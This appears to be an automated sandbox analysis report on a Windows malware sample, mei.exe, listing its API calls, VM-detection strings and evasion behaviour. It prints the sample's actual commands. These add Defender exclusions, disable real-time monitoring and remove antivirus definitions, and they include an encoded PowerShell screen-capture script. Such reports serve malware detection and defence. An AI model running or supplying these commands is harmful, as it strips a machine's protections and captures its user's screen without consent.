              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F1D94 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6313F1D94
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313D8880 FindFirstFileExW,FindClose,0_2_00007FF6313D8880
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,89_2_00007FF7D79E46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A288E0 FindFirstFileExA,89_2_00007FF7D7A288E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,89_2_00007FF7D79DE21C
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1A0180 GetSystemInfo,1_2_00007FFDFF1A0180
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: getmac.exe, 00000040.00000002.1823733565.00000265219C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"S
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: mei.exe, 00000001.00000003.1681553777.000002E913F6E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: mei.exe, 00000001.00000003.1788371805.000002E914117000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819727719.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819939780.000002E914114000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1789104763.000002E914B88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313EAA88 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6313EAA88
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFB287B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB287B30
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F39A0 GetProcessHeap,0_2_00007FF6313F39A0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313EAA88 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6313EAA88
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313DBC90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6313DBC90
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313DC52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6313DC52C
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313DC710 SetUnhandledExceptionFilter,0_2_00007FF6313DC710
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC73058 IsProcessorFeaturePresent,00007FFE1A4519C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A4519C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAC73058
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00312135 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE00312135
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00311CBC SetUnhandledExceptionFilter,1_2_00007FFE00311CBC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1B6D8 SetUnhandledExceptionFilter,89_2_00007FF7D7A1B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,89_2_00007FF7D7A1A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,89_2_00007FF7D7A1B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A24C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,89_2_00007FF7D7A24C10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              DLL side loading technique detected
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
